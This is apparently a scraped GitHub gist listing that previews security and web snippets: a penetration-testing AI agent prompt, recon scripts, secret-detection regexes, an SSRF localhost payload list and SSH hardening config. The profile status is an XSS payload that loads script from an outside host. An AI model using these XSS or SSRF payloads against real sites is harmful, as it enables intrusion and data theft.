Skip to content

Instantly share code, notes, and snippets.

View geeknik's full-sized avatar
💭
><script src=//xss.mx></script><X="

geeknik geeknik

💭
><script src=//xss.mx></script><X="
347 followers · 87 following
View GitHub Profile
@nullenc0de
nullenc0de / external_pentest.yaml
Created April 7, 2025 20:56
nerve run external.yaml --target "example.com"
agent: >
You are an expert penetration tester tasked with performing an external penetration test on a specified target (e.g., IP address or domain). Your goal is to identify vulnerabilities, propose exploitation methods, and deliver actionable findings with proof-of-concept details in `PENTEST.md`.
## Instructions
- Target external assets specified via {{ target }} (e.g., public IPs, domains).
- Follow a systematic yet creative methodology: reconnaissance, scanning, exploitation, and post-exploitation.
- Use available data (e.g., provided outputs, hypothetical scan results) or execute commands to gather more as needed.
- Identify confirmed vulnerabilities or exploitable weaknesses with evidence (e.g., tool outputs, HTTP responses).
- Avoid stopping at "nothing found"—if initial scans (e.g., port scans) yield no results, dig deeper with alternative tools, techniques, or assumptions.
- Prioritize high-impact vulnerabilities (e.g., remote code execution, privilege escalation, data exposure, aut
@monteslu
monteslu / gpu.html
Created September 12, 2024 20:35
single page compute shader in webgpu much faster than CPU equivalent.
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WebGPU Compute Shader Example</title>
</head>
<body>
<h1>WebGPU Compute Shader Example</h1>
<p id="output"></p>
<script type="module">
@felipecaon
felipecaon / jsluice_rules.json
Last active December 21, 2024 09:13
jsluice rules
[
{
"name": "ADMIN_PASSWORD",
"value": "(admin).+(secret|token|key|password).+"
},
{
"name": "AWS API Gateway",
"value": "[0-9a-z]+.execute-api.[0-9a-z.-_]+.amazonaws.com"
},
{
@metasikander
metasikander / NIP-05_Simple_Guide.md
Last active March 16, 2025 03:50
A small minimal guide on setting up NIP-05 identifier on branle/nostr

This is a very basic guide, just to understand what's needed to set it up.
If you have any questions you can find me at https://nostr.com/8355095016fddbe31fcf1453b26f613553e9758cf2263e190eac8fd96a3d3de9

Prerequisite

Setup static file on server

Create a file that resolves to <domain>/.well-known/nostr.json, and fill it out like this (enter the name you want to use, and input your own public key, make sure its the HEX-key):

{
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@nullenc0de
nullenc0de / apk-recon.yaml
Created July 30, 2021 14:35
id: apk-recon
info:
name: APK Recon
author: nullenc0de
severity: info
tags: android,file
file:
- extensions:
@ResistanceIsUseless
ResistanceIsUseless / ssrf-host.txt
Last active March 13, 2024 17:24
SSRF Payloads
127.0.0.1
127.0.1.3
0
127.1
127.0.1
localhost
1.0.0.127.in-addr.arpa
01111111000000000000000000000001
0x7f.0x0.0x0.0x1
0177.0.0.01
@nckroy
nckroy / eran-hammer-oauth2-rant-20120726.md
Created January 21, 2021 00:15
OAuth 2.0 and the Road to Hell

(Scraped from the Internet Wayback Machine. Original content by Eran Hammer / hueniverse.com July 26, 2012)

OAuth 2.0 and the Road to Hell

They say the road to hell is paved with good intentions. Well, that’s OAuth 2.0.

Last month I reached the painful conclusion that I can no longer be associated with the OAuth 2.0 standard. I resigned my role as lead author and editor, withdraw my name from the specification, and left the working group. Removing my name from a document I have painstakingly labored over for three years and over two dozen drafts was not easy. Deciding to move on from an effort I have led for over five years was agonizing.

There wasn’t a single problem or incident I can point to in order to explain such an extreme move. This is a case of death by a thousand cuts, and as the work was winding down, I’ve found myself reflecting more and more on what we actually accomplished. At the end, I reached the conclusion that OAuth 2.0 is a bad

@lizthegrey
lizthegrey / attributes.rb
Last active March 27, 2025 02:16
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
@JoeyBurzynski
JoeyBurzynski / 55-bytes-of-css.md
Last active April 8, 2025 14:18
58 bytes of css to look great nearly everywhere

58 bytes of CSS to look great nearly everywhere

When making this website, i wanted a simple, reasonable way to make it look good on most displays. Not counting any minimization techniques, the following 58 bytes worked well for me:

main {
  max-width: 38rem;
  padding: 2rem;
  margin: auto;
}